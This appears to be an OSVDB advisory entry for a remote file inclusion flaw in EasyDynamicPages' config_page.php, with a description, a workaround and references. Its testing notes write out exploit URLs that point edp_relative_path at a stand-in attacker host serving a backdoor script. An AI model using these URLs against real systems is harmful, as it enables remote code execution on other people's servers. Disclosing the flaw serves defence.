EasyDynamicPages config_page.php Arbitrary Command Execution

2004-01-02T00:00:00
ID OSVDB:3408
Type osvdb
Reporter OSVDB
Modified 2004-01-02T00:00:00

Description

Vulnerability Description

EasyDynamicPages contains a flaw that may allow a malicious user to execute arbitrary code on a vulnerable system. The issue is triggered by a specially crafted URL request to the "config_page.php" script. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:

Protect the "dynamicpages/fast" folder with .htaccess or similar to ensure that only trused users can access it.

Short Description

EasyDynamicPages contains a flaw that may allow a malicious user to execute arbitrary code on a vulnerable system. The issue is triggered by a specially crafted URL request to the "config_page.php" script. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

Manual Testing Notes

Exploit: http://victim/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://attacker/

If an attacker has Script backdoor in URL : http://attacker/admin/site_settings.php

Then attacker exploit : http://victim/dynamicpages/fast/config_page.php?do=add_page&du=dpage&edp_relative_path=http://attacker/

References:

Vendor URL: http://software.stoitsov.com/ Vendor URL: http://software.stoitsov.com/free/description.php?software=EasyDynamicPages Secunia Advisory ID:10535 Other Advisory URL: http://www.security-corporation.com/articles-20040103-001.html Other Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2004-01/0005.html Nessus Plugin ID:11976 Keyword: Remote File Inclusion ISS X-Force ID: 14136 Bugtraq ID: 9338